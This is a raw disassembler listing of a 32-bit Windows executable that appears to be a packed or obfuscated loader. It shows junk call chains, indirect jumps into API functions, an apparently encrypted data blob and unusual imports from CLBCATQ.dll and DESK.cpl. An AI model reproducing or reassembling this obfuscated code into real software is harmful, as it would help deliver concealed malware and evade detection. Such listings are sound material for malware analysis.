; =============== S U B	R O U T	I N E =======================================


sub_401FBD	proc near		; CODE XREF: sub_401FA9+7p
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 3Ch
		pop	ebp
		retn	0
sub_401FBD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401FC8	proc near		; CODE XREF: sub_401690+1Bp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 60h
		mov	ecx, offset dword_4BA3B8
		adc	dword ptr [ecx-278h], 6Bh
		push	ecx
		push	0
		rep call sub_401FEC
		mov	eax, ds:Sleep
		jmp	eax
sub_401FC8	endp


; =============== S U B	R O U T	I N E =======================================


sub_401FEC	proc near		; CODE XREF: sub_401FC8+17p
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		push	ebx
		push	edx
		push	eax
		push	dword ptr [ecx+2CCh]
		call	sub_401224
		add	esp, 10h
		pop	ecx
		push	ecx
		push	0
		rep call sub_402013
		mov	eax, ds:GetDC
		jmp	eax
sub_401FEC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_402013	proc near		; CODE XREF: sub_401FEC+1Ap
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 60h
		pop	ebp
		retn	0
sub_402013	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 32h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_402050	proc near		; CODE XREF: sub_401AB4+1Ap
		mov	edi, edi
		push	ebp

loc_402053:				; CODE XREF: sub_402050+13j
		mov	ebp, esp
		sub	esp, 2Ch
		lea	eax, [esi+0F4h]
		cmp	eax, 433Ch
		jbe	short loc_402053
		push	eax
		mov	ebx, 0
		push	ebx
		rep call sub_402079
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_402050	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_402079	proc near		; CODE XREF: sub_402050+1Cp
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		push	esi
		push	edi
		call	sub_401B30
		add	esp, 8
		pop	eax
		push	eax
		push	0
		rep call sub_402099
		mov	eax, ds:IsWindow
		jmp	eax
sub_402079	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_402099	proc near		; CODE XREF: sub_402079+13p
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 2Ch
		pop	ebp
		retn	0
sub_402099	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 30h dup(90h)
		dd 0A1161CECh, 7477D909h, 0EE931148h, 5DE7012Fh, 1D5D6814h
		dd 0AFA4ED12h, 55B82963h, 4FD13431h, 6797298Ah,	0FED06140h
		dd 366B1B77h, 5EF711CBh
; ---------------------------------------------------------------------------
		pushf
		retn
; ---------------------------------------------------------------------------
word_402106	dw 0E250h		; DATA XREF: sub_401CE0+Fo
		dd 15C616B5h, 779CF4A5h, 5207DF24h, 202769B3h, 45F00CAAh
		dd 0E185DC09h, 1DA606BFh, 72ACFCA0h, 2C9292EAh,	98E8E9F7h
		dd 0B4F7F768h, 260554A3h, 0F25E8079h, 5F5C96C2h, 520DF7A2h
		dd 0D7F954A7h, 0C0F955B0h, 2089480Fh, 0E546B8F8h, 0EDCB43Dh
		dd 6B7A52E1h, 54C2D692h, 4B8190FDh, 1C279AECh, 5A5B9EF6h
		dd 0C33395CDh, 74E5886Dh, 0B093C4D1h, 9AFC8597h, 7BEA2299h
		dd 17FB5018h, 7DD85747h, 0C5981AE5h, 5E1E0B51h,	5100FABFh
		dd 0DEA3EAA0h, 11180AAFh, 30450A7h, 7F9CDDA5h, 0CE01912Dh
		dd 98F9081Eh, 0BA2835F0h, 0C7DEE507h, 221A763Fh, 4D4FC4E0h
		dd 0B0FC5217h, 0A886D0DCh, 31F47F91h, 6010C037h, 5061A04Fh
		dd 0AF33A5D7h, 0B40E8313h, 266326C3h, 21CDC4F2h, 0C6EA6DABh
		dd 49E0C881h, 0B18EF317h, 0ABE26E8Ch, 7119C8B9h, 4EF7A8DFh
		dd 0EFC522F6h, 9F128E84h, 252B10F6h, 22430296h,	6F46831Fh
		dd 0C8DCBEA0h, 9BE4F120h, 0B01897C5h, 92480489h, 362F54BFh
		dd 4F3C61F6h, 0AF352607h, 24713C87h, 0ED2606B0h, 954508FDh
		dd 72267F4Fh, 0D20539E5h, 4E0C8364h, 51FCD28Fh,	0DECB4DC8h
		dd 25E1E47Bh, 0AF03CE47h, 0AE066067h, 9137448Ch, 38E4624Bh
		dd 0AB199765h, 2D691C71h, 0E1CE71C7h, 0A010C630h, 0B3041C72h
		dd 0B24E4DC1h, 78292BF3h, 0AE3DBB5Dh, 28387355h, 9F3CD2ABh
		dd 5BD4EE6Ah, 0C661142Ah, 2925758Fh, 0B370A690h, 8F798EE0h
		dd 39C3399Bh, 0E49EE51Ah, 8E18E572h, 0B8F38D86h, 2FDCA1B2h
		dd 0D1823B22h, 18BEE679h, 0A4D68C27h, 694B9ECh,	8C1E395h
		dd 54D81A76h, 0E19866DDh, 9BABB791h, 7CAD4843h,	0EA1AE71Ah
		dd 837C8375h, 5B32475Dh, 6928D3B7h, 0D860B624h,	14E84651h
		dd 0B616DCD7h, 0AD6D1AC4h, 92DDC89Ch, 0B7911E28h, 2E103A48h
		dd 4A140750h, 0DF33E4A8h, 923E0DABh, 0B9E151A2h, 0B304572Eh
		dd 0EE21D8F3h, 89EF378Ah, 3087643Ah, 9B0C5207h,	3E5A9ABCh
		dd 9D48B695h, 0B25C5B40h, 1D56D25Fh, 65D80A45h,	0D3A07969h
		dd 9A1A384Ah, 88F23BD5h, 0B1476719h, 7DDBA377h,	4DE87E44h
		dd 0CD8ED154h, 9F6695E1h, 5CC82ACFh, 0B06A768Fh, 921F1509h
		dd 3647C67Fh, 70322916h, 0D8A7707Bh, 0A4F2D352h, 8589CAE3h
		dd 0B27BA03Bh, 27C2D8FDh, 71141381h, 0CAF93ACCh, 9A8361BEh
		dd 27BD9FA0h, 42A04454h, 0BF9B88DEh, 0FA0A99F0h, 5A4C035Bh
		dd 0ABE65451h, 96A19C5Ah, 15729362h, 0E85289DAh, 0B7133116h
		dd 777B9BCAh, 0C557B62Ah, 2C5F24EAh, 6AD06E2Fh,	4B387F73h
		dd 0D168C046h, 984D23ECh, 27DC6E09h, 708A54A9h,	8C4626A6h
		dd 8A2F3DFDh, 3B50656Bh, 3AD7CD5Ah, 339901D6h, 671B837Fh
		dd 24F23E50h, 6EAAE559h, 48AA8D63h, 31A9C5A4h, 9504773Ah
		dd 414F8C8Eh, 0E3C20B81h, 4FD1FF28h, 82FDADD2h,	47F55917h
		dd 5D955299h, 59C957B3h, 61F54308h, 218982C0h, 20BA8EF2h
		dd 70B2B8EFh, 0B029FA88h, 0D8EA52C0h, 149AD707h, 0FA33EB7Ch
		dd 3F60A65h, 8BDAF9CDh,	159ED918h, 0FB08EBCDh, 0E47CFFE2h
		dd 15ACE0D1h, 83A77244h, 4A6F4A12h, 14BBE6DFh, 76A20CA1h
		dd 44AEE597h, 0DEC84734h, 0F283DC65h, 0DDBE11CCh, 92A0FED2h
		dd 0B6866896h, 7548CBB4h, 0FFFFCEB1h, 818018B0h, 3FBFBB8Fh
		dd 6C9EAE38h, 0C96F91AEh, 5CFC3728h, 0D94AA5BCh, 0A1FEB1E2h
		dd 0DCA4AB0Fh, 83236AFCh, 0FAE5D5DAh, 4D9089D7h, 8E439889h
		dd 39E8ECDFh, 79738990h, 53C63B37h, 0B5F2EF1Bh,	268F41C3h
		dd 72A05F1Eh, 20AFD070h, 0EFA797B0h, 2D20BE27h,	3BB30208h
		dd 1CC467BDh, 0F29DCC42h, 40E18E26h, 608F38EFh,	89E0D7D0h
		dd 0BC8F9438h, 0DBD8AA2Bh, 9393AAEEh, 70CE9ED0h, 0C898B0D8h
		dd 0D5C41BDBh, 969DF216h, 6EB97B3Ch, 0C9A342A2h, 27AED2F6h
		dd 4D6BF046h, 5B3A5D68h, 18CD633Eh, 0DCE6D9D9h,	0F10919Eh
		dd 7C6BB789h, 4D22993Ch, 1A7413A7h, 0B94F0BA1h,	2892CC6Bh
		dd 0D4B699CAh, 96A4B4C0h, 389DA8F9h, 9F79577Bh,	3E38ACB7h
		dd 64401EA7h, 9B0B4D29h, 0A7C3DEC7h, 60EEBDA7h,	5333FBEEh
		dd 0BAC805F2h, 26FCC068h, 0E181EC49h, 10CEF1EDh, 0F5238709h
		dd 7AEDC1CFh, 6671CA1Eh, 0AEC71AF1h, 0FE9BD34Ah, 0C8AA196h
		dd 3F45FBAAh, 0C92D527Bh, 9CF556C2h, 72DB53F1h,	0BF1DA660h
		dd 59D9D1C3h, 1C93171Eh, 12DAB8FAh, 3209C0Eh, 0FFEFB6B6h
		dd 992988A4h, 0BFEB3BADh, 89DB8E99h, 3C9E38B3h,	0A206E2F9h
		dd 3EB49B10h, 30310279h, 0DDB774Fh, 7AAAE5BDh, 83398D21h
		dd 9FA69A9Bh, 33CD9F33h, 0B013066h, 0AEFF67CFh,	1380B70Eh
		dd 9315A381h, 0A4A06CAh, 860F529Ah, 40147AF7h, 6080FEC4h
		dd 0D0BF815Eh, 1914FFD5h, 7348D45Bh, 8760CE28h,	3C237E61h
		dd 266F5925h, 0EDC85592h, 26C049BFh, 0D5009E81h, 16001D2Bh
		dd 237463D2h, 0E233367Bh, 8E3AC838h, 0F967A039h, 83203858h
		dd 0FF74E429h, 12FDB5Fh, 74567BB8h, 3D3B2A8Ah, 0B236DD2Bh
		dd 0AAECE769h, 1B14990Fh, 0B36007C9h, 26260385h, 0BD450A93h
		dd 0A947CB0Ah, 0AC0302D0h, 66897E97h, 0DF82C1D8h, 7BBE9F13h
		dd 0E794097Dh, 387C8688h, 14BB3B49h, 0A1FB0CC4h, 0AF2D3D4Eh
		dd 2C416DAEh, 2D4055EDh, 3FB0D462h, 61A834B7h, 153942A4h
		dd 0FAA3E21Eh, 13D25379h, 0F796D6A0h, 5B494AFh,	0FEA5B610h
		dd 3413E7F7h, 33B072FAh, 0CD552CDDh, 0A24A39C4h, 0BFDDD19Eh
		dd 8E7C1730h, 0BDC052F5h, 2D914C84h, 0A41D9434h, 0E27E7B36h
		dd 0F56E2882h, 0E63EBBF1h, 5613F3CAh, 4DB8315Ch, 0C5A65B56h
		dd 0A16D064Ch, 89C65F9Bh, 0A41A5BF5h, 2E5AD66Fh, 40D294D8h
		dd 3595B5FEh, 0E7A5B011h, 0DAE2CE3h, 62A5748Eh,	4FAD46BDh
		dd 2EA8AFF8h, 51AC1224h, 0D8A9F76Eh, 941507B2h,	0B65D7D90h
		dd 7C514137h, 0C3FBB563h, 9F832A12h, 94F2DF6h, 0D0D43A04h
		dd 0D42044A0h, 0CE3D2AB3h, 54BF3755h, 62C0EAEEh, 0C180ECD1h
		dd 5C9FA570h, 804B9A26h, 639B0789h, 3C8B1884h, 2BB88B6Bh
		dd 0D7EA3FF5h, 9893099Fh, 1A70223Bh, 8F07EFF9h,	1B79304h
		dd 0BF31FE60h, 34E9272Ch, 668C23A9h, 4DB9EE2Bh,	0DAA308EAh
		dd 93AE7B8Ah, 0B7A8C23Ah, 0A5AB9EE2h, 0AEAA308Eh, 0B7AAE7B8h
		dd 0FBAA8C23h, 87AAB9F2h, 2D91A306h, 92B78881h,	6B381A4Fh
		dd 1269BF80h, 595D110Ah, 0Eh dup(0)
		dd 200h	dup(?)
_text		ends

; Section 2. (virtual address 00003000)
; Virtual size			: 000B7000 ( 749568.)
; Section size in file		: 00000600 (   1536.)
; Offset to raw	data for section: 0004FC00
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
;
; Imports from KERNEL32.dll
;
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_rdata		segment	para public 'DATA' use32
		assume cs:_rdata
		;org 403000h
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags,	LPDWORD	lpThreadId)
CreateThread	dd ?
; void __stdcall Sleep(DWORD dwMilliseconds)
Sleep		dd ?			; DATA XREF: sub_401DA8+Br
					; sub_401FC8+1Dr
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
GetSystemTime	dd ?
; BOOL __stdcall CloseHandle(HANDLE hObject)
CloseHandle	dd ?			; DATA XREF: sub_401450+42r
					; sub_401690+30r ...
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
LocalFree	dd ?			; DATA XREF: sub_401737+24r
					; sub_401D78+29r ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
HeapCreate	dd ?
; BOOL __stdcall PulseEvent(HANDLE hEvent)
PulseEvent	dd ?			; DATA XREF: sub_401CE0+56r
; BOOL __stdcall LocalUnlock(HLOCAL hMem)
LocalUnlock	dd ?			; DATA XREF: sub_40166C+11r
					; sub_401714+1Cr ...
; HMODULE __stdcall LoadLibraryW(LPCWSTR lpLibFileName)
LoadLibraryW	dd ?			; DATA XREF: start+25r	sub_401C9C+30o	...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
GetModuleHandleA dd ?			; DATA XREF: sub_4010BC+26r
					; sub_40111C+21o ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD	dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes,	DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE	hTemplateFile)
CreateFileA	dd ?
; int __stdcall	lstrlenA(LPCSTR	lpString)
lstrlenA	dd ?			; DATA XREF: sub_40133C+30r starto ...
; BOOL __stdcall GetComputerNameA(LPSTR	lpBuffer, LPDWORD nSize)
GetComputerNameA dd ?
; BOOL __stdcall SetEvent(HANDLE hEvent)
SetEvent	dd ?			; DATA XREF: sub_4011AB+20r
					; sub_401499+11r ...
; void __stdcall SetLastError(DWORD dwErrCode)
SetLastError	dd ?			; DATA XREF: sub_4014BC+2Fr
					; sub_4018E4+38r ...
; LPWSTR __stdcall GetCommandLineW()
GetCommandLineW	dd ?			; DATA XREF: sub_4014F2+Br
					; sub_401AB4+29r
; DWORD	__stdcall GetTickCount()
GetTickCount	dd ?			; DATA XREF: sub_4011FE+15r
					; sub_401373+9r ...
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
UnmapViewOfFile	dd ?			; DATA XREF: sub_401090+25r
					; sub_4010F8+1Dr ...
; DWORD	__stdcall GetCurrentDirectoryA(DWORD nBufferLength, LPSTR lpBuffer)
GetCurrentDirectoryA dd	?
; DWORD	__stdcall GetConsoleTitleA(LPSTR lpConsoleTitle, DWORD nSize)
GetConsoleTitleA dd ?			; DATA XREF: start+Cr
		dd 0
;
; Imports from USER32.dll
;
; HWND __stdcall SetFocus(HWND hWnd)
SetFocus	dd ?
; HWND __stdcall GetDlgItem(HWND hDlg, int nIDDlgItem)
GetDlgItem	dd ?
; int __stdcall	FillRect(HDC hDC, const	RECT *lprc, HBRUSH hbr)
FillRect	dd ?
; BOOL __stdcall IsWindow(HWND hWnd)
IsWindow	dd ?			; DATA XREF: sub_401188+1Cr
					; sub_4011DC+1Br ...
; BOOL __stdcall DrawMenuBar(HWND hWnd)
DrawMenuBar	dd ?
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
DispatchMessageA dd ?
; BOOL __stdcall CheckRadioButton(HWND hDlg, int nIDFirstButton, int nIDLastButton, int	nIDCheckButton)
CheckRadioButton dd ?
; HDC __stdcall	GetDC(HWND hWnd)
GetDC		dd ?			; DATA XREF: sub_4016C7+Br
					; sub_401A64+27r ...
; HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y,	int nWidth, int	nHeight, HWND hWndParent, HMENU	hMenu, HINSTANCE hInstance, LPVOID lpParam)
CreateWindowExA	dd ?
; BOOL __stdcall DrawEdge(HDC hdc, LPRECT qrc, UINT edge, UINT grfFlags)
DrawEdge	dd ?
; BOOL __stdcall GetScrollBarInfo(HWND hwnd, LONG idObject, PSCROLLBARINFO psbi)
GetScrollBarInfo dd ?
; SHORT	__stdcall GetKeyState(int nVirtKey)
GetKeyState	dd ?
; LRESULT __stdcall CallWindowProcA(WNDPROC lpPrevWndFunc, HWND	hWnd, UINT Msg,	WPARAM wParam, LPARAM lParam)
CallWindowProcA	dd ?
		dd 0
;
; Imports from CLBCATQ.dll
;
SetSetupOpen	dd ?
CheckMemoryGates dd ?
SetupOpen	dd ?
UpdateFromAppChange dd ?
DowngradeAPL	dd ?
		dd 0
;
; Imports from DESK.cpl
;
InstallScreenSaver dd ?
		dd 0
		dd 3110h, 2 dup(0)
		dd 32F6h, 3000h, 3164h,	2 dup(0)
		dd 33C6h, 3054h, 319Ch,	2 dup(0)
		dd 3428h, 308Ch, 31B4h,	2 dup(0)
		dd 344Ah, 30A4h, 5 dup(0)
		dd 321Ah, 3274h, 31E0h,	31F0h, 3238h, 32D6h, 322Ah, 327Ch
		dd 31BCh, 32A2h, 32B6h,	3244h, 3250h, 320Eh, 31FEh, 32E4h
		dd 3264h, 32C4h, 328Ah,	31CCh, 0
		dd 33ACh, 3342h, 338Ch,	336Ch, 3310h, 3358h, 3378h, 3350h
		dd 331Eh, 3304h, 3398h,	33B8h, 3330h, 0
		dd 33F4h, 3414h, 33E8h,	33D2h, 3404h, 0
		dd 3434h, 0
		dd 6F4C033Dh, 694C6461h, 72617262h, 5779h, 654701B7h, 6E6F4374h
		dd 656C6F73h, 6C746954h, 4165h,	65470279h, 73795374h, 546D6574h
		dd 656D69h, 6C430054h, 4865736Fh, 6C646E61h, 4740065h
		dd 4C746553h, 45747361h, 726F7272h, 45A0000h, 45746553h
		dd 746E6576h, 0B70000h,	61657243h, 68546574h, 64616572h
		dd 39B0000h, 736C7550h,	65764565h, 746Eh, 6F4C0349h, 466C6163h
		dd 656572h, 736C054Eh, 656C7274h, 416Eh, 6547018Eh, 6D6F4374h
		dd 65747570h, 6D614E72h, 4165h,	654701C7h, 63695474h, 756F436Bh
		dd 746Eh, 6C5304B3h, 706565h, 6F4C034Fh, 556C6163h, 636F6C6Eh
		dd 1C0006Bh
aGetcurrentdire	db 'GetCurrentDirectoryA',0
		align 2
		dw 177h
aGetmodulehandl	db 'GetModuleHandleA',0
		align 2
aK		db 'Š',0
aCreatefilea	db 'CreateFileA',0
		dd 6E5504D7h, 5670616Dh, 4F776569h, 6C694666h, 4F10065h
		dd 70616548h, 61657243h, 6574h,	65470188h, 6D6F4374h, 646E616Dh
		dd 656E694Ch, 454B0057h, 4C454E52h, 642E3233h, 6C6Ch, 724406A8h
		dd 64457761h, 6567h, 724406AEh,	654D7761h, 6142756Eh, 6520072h
		dd 61657243h, 69576574h, 776F646Eh, 417845h, 614305FBh
		dd 69576C6Ch, 776F646Eh, 636F7250h, 70C0041h, 44746547h
		dd 7449676Ch, 6D65h, 65470706h,	434474h, 69440693h, 74617073h
		dd 654D6863h, 67617373h, 4165h,	734907C0h, 646E6957h, 776Fh
		dd 68430626h, 526B6365h, 6F696461h, 74747542h, 6E6Fh, 694606DBh
		dd 65526C6Ch, 7463h
aYGetscrollbari	db 'Y',7,'GetScrollBarInfo',0
		align 4
		dd 65530711h, 636F4674h, 7375h,	65470722h, 79654B74h, 74617453h
		dd 53550065h, 32335245h, 6C6C642Eh, 60000h
aUpdatefromappc	db 'UpdateFromAppChange',0
		db  1Fh
		align 2
aSetupopen	db 'SetupOpen',0
		db  1Dh
		align 2
aSetsetupopen	db 'SetSetupOpen',0
		align 4
		db    4
		align 2
aDowngradeapl	db 'DowngradeAPL',0
		align 4
		db 9,0
aCheckmemorygat	db 'CheckMemoryGates',0
		align 4
aClbcatq_dll	db 'CLBCATQ.dll',0
		db    6
		align 2
aInstallscreens	db 'InstallScreenSaver',0
		align 2
aDesk_cpl	db 'DESK.cpl',0
		align 4
		dd 6Bh dup(0)
		dd 2DA80h dup(?)
_rdata		ends

; Section 3. (virtual address 000BA000)
; Virtual size			: 0000040A (   1034.)
; Section size in file		: 00000600 (   1536.)
; Offset to raw	data for section: 00050200
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 4BA000h
		dd 4 dup(20202020h)
dword_4BA010	dd 5 dup(20202020h)	; DATA XREF: sub_401A04+8o
asc_4BA024	db '                                                                 '
					; DATA XREF: sub_401090+8o
		db '                                                                 '
		db '                                                                 '
		db '                         e',0
		db 'f',0
aSaduDll:
		unicode	0, <sadu*dll>,0
		align 4
		dd 8 dup(0)
dword_4BA138	dd 8 dup(0)		; DATA XREF: sub_401B30+8o
dword_4BA158	dd 28h dup(0)		; DATA XREF: sub_4018E4+8o
dword_4BA1F8	dd 29h dup(0)		; DATA XREF: sub_401570+8o
dword_4BA29C	dd 3 dup(0)		; DATA XREF: sub_401188+8o
dword_4BA2A8	dd 0Eh dup(0)		; DATA XREF: sub_401C9C+Ao
dword_4BA2E0	dd 14h dup(0)		; DATA XREF: sub_4014BC+8o
dword_4BA330	dd 19h dup(0)		; DATA XREF: sub_40133C+8o
dword_4BA394	dd 2 dup(0)		; DATA XREF: sub_401B94+8o
dword_4BA39C	dd 0			; DATA XREF: sub_401630+8o
dword_4BA3A0	dd 6 dup(0)		; DATA XREF: sub_4010F8+8o
dword_4BA3B8	dd 92h dup(0)		; DATA XREF: sub_401FC8+8o
		align 1000h
_data		ends


		end start
